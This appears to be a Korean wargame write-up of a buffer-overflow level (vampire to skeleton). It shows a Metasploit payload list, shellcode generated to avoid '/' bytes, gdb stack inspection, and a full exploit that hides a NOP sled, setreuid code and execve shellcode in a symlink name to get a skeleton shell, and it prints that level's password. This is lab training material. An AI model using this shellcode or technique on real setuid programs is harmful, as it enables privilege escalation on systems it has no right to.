 windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
 windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
 windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
 windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
 windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline
 windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
 windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
 windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
 windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
 windows/upexec/find_tag normal Windows Upload/Execute, Find Tag Ordinal Stager
 windows/upexec/reverse_http normal Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
 windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
 windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
 windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
 windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
 windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
 windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
 windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
 windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
 windows/vncinject/find_tag normal VNC Server (Reflective Injection), Find Tag Ordinal Stager
 windows/vncinject/reverse_http normal VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
 windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
 windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
 windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
 windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
 windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
 windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
 windows/x64/exec normal Windows x64 Execute Command
 windows/x64/meterpreter/bind_tcp normal Windows x64 Meterpreter, Windows x64 Bind TCP Stager
 windows/x64/meterpreter/reverse_tcp normal Windows x64 Meterpreter, Windows x64 Reverse TCP Stager
 windows/x64/shell/bind_tcp normal Windows x64 Command Shell, Windows x64 Bind TCP Stager
 windows/x64/shell/reverse_tcp normal Windows x64 Command Shell, Windows x64 Reverse TCP Stager
 windows/x64/shell_bind_tcp normal Windows x64 Command Shell, Bind TCP Inline
 windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline
 windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
 windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager

msf > use linux/x86/exec
msf payload(exec) > show options

Module options:

 Name Current Setting Required Description
---- --------------- -------- -----------
 CMD yes The command string to execute

msf payload(exec) > set CMD /bin/sh
CMD => /bin/sh
msf payload(exec) > generate -b '\x2f' -t c
/*
 * linux/x86/exec - 70 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * PrependSetresuid=false, PrependSetreuid=false,
 * PrependSetuid=false, PrependChrootBreak=false,
 * AppendExit=false, CMD=/bin/sh
 */
unsigned char buf[] =
\xd9\xe8\xd9\x74\x24\xf4\x5f\xbd\xb1\x4d\x3c\x4f\x29\xc9\xb1
\x0b\x31\x6f\x1a\x03\x6f\x1a\x83\xef\xfc\xe2\x44\x27\x37\x17
\x3f\xea\x21\xcf\x12\x68\x27\xe8\x04\x41\x44\x9f\xd4\xf5\x85
\x3d\xbd\x6b\x53\x22\x6f\x9c\x6b\xa5\x8f\x5c\x43\xc7\xe6\x32
\xb4\x74\x90\xca\x9d\x29\xe9\x2a\xec\x4e;
msf payload(exec) >

Metaploit 에서 -b 옵션을 주면 해당 문자열은 쉘코드를 생성할때 제거가 되어 나타나게 된다. 이렇게 제거하고자 하는 문자열을 제거한채 쉘코드를 작성할 수 있었다.

이제 이 쉘코드를 이용하여 공격을 해볼 것이다. 생성된 쉘코드가 70 바이트 이므로 앞에 NOP를 100 바이트 붙여 총 170 바이트로 공격을 할 것이다.

공격 전 아래와 같이 170 바이트의 파일명으로 심볼릭링크를 생성 후 스택에서 어느 주소값에 쓰이는지 확인해 보도록 하자.

[vampire@localhost vampire]$ ln -s skeleton_tmp `python -c print 'A'*170`
[vampire@localhost vampire]$ ls -al
total 76
drwx------ 2 vampire vampire 4096 Dec 23 00:33 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw------- 1 vampire vampire 329 Dec 23 00:09 .bash_history
-rw-r--r-- 1 vampire vampire 24 Mar 1 2010 .bash_logout
-rw-r--r-- 1 vampire vampire 230 Mar 1 2010 .bash_profile
-rw-r--r-- 1 vampire vampire 124 Mar 1 2010 .bashrc
-rwxr-xr-x 1 vampire vampire 333 Mar 1 2010 .emacs
-rw-r--r-- 1 vampire vampire 3394 Mar 1 2010 .screenrc
-rw------- 1 vampire vampire 2905 Dec 22 23:59 .viminfo
-rw-rw-r-- 1 vampire vampire 51 Dec 22 01:55 .vimrc
lrwxrwxrwx 1 vampire vampire 12 Dec 23 00:33 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> skeleton_tmp
-rwsr-sr-x 1 skeleton skeleton 12752 Mar 3 2010 skeleton
-rw-r--r-- 1 root root 821 Mar 29 2010 skeleton.c
-rwsr-sr-x 1 vampire vampire 12752 Dec 23 00:23 skeleton_tmp
[vampire@localhost vampire]$ gdb AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i386-redhat-linux...
(gdb) b *main+369
Breakpoint 1 at 0x8048671
(gdb) r `python -c print '\xbf'*48`
Starting program: /home/vampire/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c print '\xbf'*48`

Breakpoint 1, 0x8048671 in main ()
(gdb) x/32wx $esp
0xbffff99c: 0xbfbfbfbf 0x00000000 0xbffff9e4 0xbffff9f0
0xbffff9ac: 0x40013868 0x00000002 0x08048450 0x00000000
0xbffff9bc: 0x08048471 0x08048500 0x00000002 0xbffff9e4
0xbffff9cc: 0x08048390 0x080486ac 0x4000ae60 0xbffff9dc
0xbffff9dc: 0x40013e90 0x00000002 0xbffffae1 0xbffffb9a
0xbffff9ec: 0x00000000 0xbffffbcb 0xbffffbdd 0xbffffbf6
0xbffff9fc: 0xbffffc15 0xbffffc37 0xbffffc44 0xbffffe07
0xbffffa0c: 0xbffffe26 0xbffffe43 0xbffffe58 0xbffffe77
(gdb) 
0xbffffa1c: 0xbffffe82 0xbffffe92 0xbffffe9a 0xbffffeab
0xbffffa2c: 0xbffffeb5 0xbffffec3 0xbffffed4 0xbffffee2
0xbffffa3c: 0xbffffeed 0xbfffff00 0x00000000 0x00000003
0xbffffa4c: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffa5c: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffa6c: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffa7c: 0x08048450 0x0000000b 0x000001fd 0x0000000c
0xbffffa8c: 0x000001fd 0x0000000d 0x000001fd 0x0000000e
(gdb) 
0xbffffa9c: 0x000001fd 0x00000010 0x0febfbff 0x0000000f
0xbffffaac: 0xbffffadc 0x00000000 0x00000000 0x00000000
0xbffffabc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffacc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffadc: 0x36383669 0x00000000 0x00000000 0x00000000
0xbffffaec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffafc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb0c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffb1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb8c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffb9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbcc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbdc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffc1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc8c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffc9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffccc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcdc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd0c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffd1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd8c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffd9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdcc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffddc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe0c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffe1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe8c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbffffe9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffebc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffecc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffedc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffefc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff0c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) 
0xbfffff1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff3c: 0x00000000 0x2f000000 0x656d6f68 0x6d61762f
0xbfffff4c: 0x65726970 0x4141412f 0x41414141 0x41414141
0xbfffff5c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffff6c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffff7c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffff8c: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) 
0xbfffff9c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffac: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffbc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffcc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffdc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffec: 0x41414141 0x41414141 0x41414141 0x00414141
0xbffffffc: 0x00000000 Cannot access memory at address 0xc0000000
(gdb) 
0xc0000004: Cannot access memory at address 0xc0000004
(gdb)

확인해본 결과 넉넉잡아 0xbfffff6c 주소쯤으로 잡고 공격을 진행하면 될 것으로 보인다. 이제 공격을 해보도록 하자!

[vampire@localhost vampire]$ ln -s skeleton `python -c print '\x90'*100 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\xb0\x46\xcd\x80' + '\xd9\xe8\xd9\x74\x24\xf4\x5f\xbd\xb1\x4d\x3c\x4f\x29\xc9\xb1\x0b\x31\x6f\x1a\x03\x6f\x1a\x83\xef\xfc\xe2\x44\x27\x37\x17\x3f\xea\x21\xcf\x12\x68\x27\xe8\x04\x41\x44\x9f\xd4\xf5\x85\x3d\xbd\x6b\x53\x22\x6f\x9c\x6b\xa5\x8f\x5c\x43\xc7\xe6\x32\xb4\x74\x90\xca\x9d\x29\xe9\x2a\xec\x4e'` 
[vampire@localhost vampire]$ ls -al
total 76
drwx------ 2 vampire vampire 4096 Dec 23 00:35 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw------- 1 vampire vampire 329 Dec 23 00:09 .bash_history
-rw-r--r-- 1 vampire vampire 24 Mar 1 2010 .bash_logout
-rw-r--r-- 1 vampire vampire 230 Mar 1 2010 .bash_profile
-rw-r--r-- 1 vampire vampire 124 Mar 1 2010 .bashrc
-rwxr-xr-x 1 vampire vampire 333 Mar 1 2010 .emacs
-rw-r--r-- 1 vampire vampire 3394 Mar 1 2010 .screenrc
-rw------- 1 vampire vampire 2905 Dec 22 23:59 .viminfo
-rw-rw-r-- 1 vampire vampire 51 Dec 22 01:55 .vimrc
lrwxrwxrwx 1 vampire vampire 12 Dec 23 00:33 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> skeleton_tmp
-rwsr-sr-x 1 skeleton skeleton 12752 Mar 3 2010 skeleton
-rw-r--r-- 1 root root 821 Mar 29 2010 skeleton.c
-rwsr-sr-x 1 vampire vampire 12752 Dec 23 00:23 skeleton_tmp
lrwxrwxrwx 1 vampire vampire 8 Dec 23 00:35 ????????????????????????????????????????????????????????????????????????????????????????????????????1??F_O)??1o??o??'7??h'?o?kt?*00m -> skeleton
[vampire@localhost vampire]$ ./`python -c print '\x90'*100 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\xb0\x46\xcd\x80' + '\xd9\xe8\xd9\x74\x24\xf4\x5f\xbd\xb1\x4d\x3c\x4f\x29\xc9\xb1\x0b\x31\x6f\x1a\x03\x6f\x1a\x83\xef\xfc\xe2\x44\x27\x37\x17\x3f\xea\x21\xcf\x12\x68\x27\xe8\x04\x41\x44\x9f\xd4\xf5\x85\x3d\xbd\x6b\x53\x22\x6f\x9c\x6b\xa5\x8f\x5c\x43\xc7\xe6\x32\xb4\x74\x90\xca\x9d\x29\xe9\x2a\xec\x4e'` `python -c print 'A'*44 + '\x6c\xff\xff\xbf'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAl
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder
bash$
ByJJoon

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다